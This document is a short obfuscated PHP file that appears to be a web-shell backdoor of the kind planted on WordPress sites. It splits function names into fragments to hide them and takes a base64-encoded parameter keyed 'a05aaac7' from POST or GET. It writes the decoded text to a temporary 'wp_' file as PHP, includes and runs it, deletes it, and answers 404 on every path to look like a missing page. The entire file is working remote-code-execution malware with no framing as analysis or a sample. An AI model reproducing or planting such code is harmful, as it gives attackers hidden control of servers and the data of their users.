<?php
try{
$o1aaa7=array('sys_get_temp_d'.'ir','base64_de'.'code','array_key_'.'exists','fil'.'e_put_contents','te'.'mpnam','unl'.'ink');
$v07c1e='a05aa'.'ac7';
if($o1aaa7[2]($v07c1e,$_POST)){
$r55363=$o1aaa7[1]($_POST[$v07c1e]);
}elseif($o1aaa7[2]($v07c1e,$_GET)){
$r55363=$o1aaa7[1]($_GET[$v07c1e]);
}else{$r55363=null;}
if($r55363){
$efdc3e=$o1aaa7[4]($o1aaa7[0](),'w'.'p_');
if($efdc3e){
$o1aaa7[3]($efdc3e,'<'.'?ph'.'p '.$r55363);
http_response_code(404);
@include_once($efdc3e);
@$o1aaa7[5]($efdc3e);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
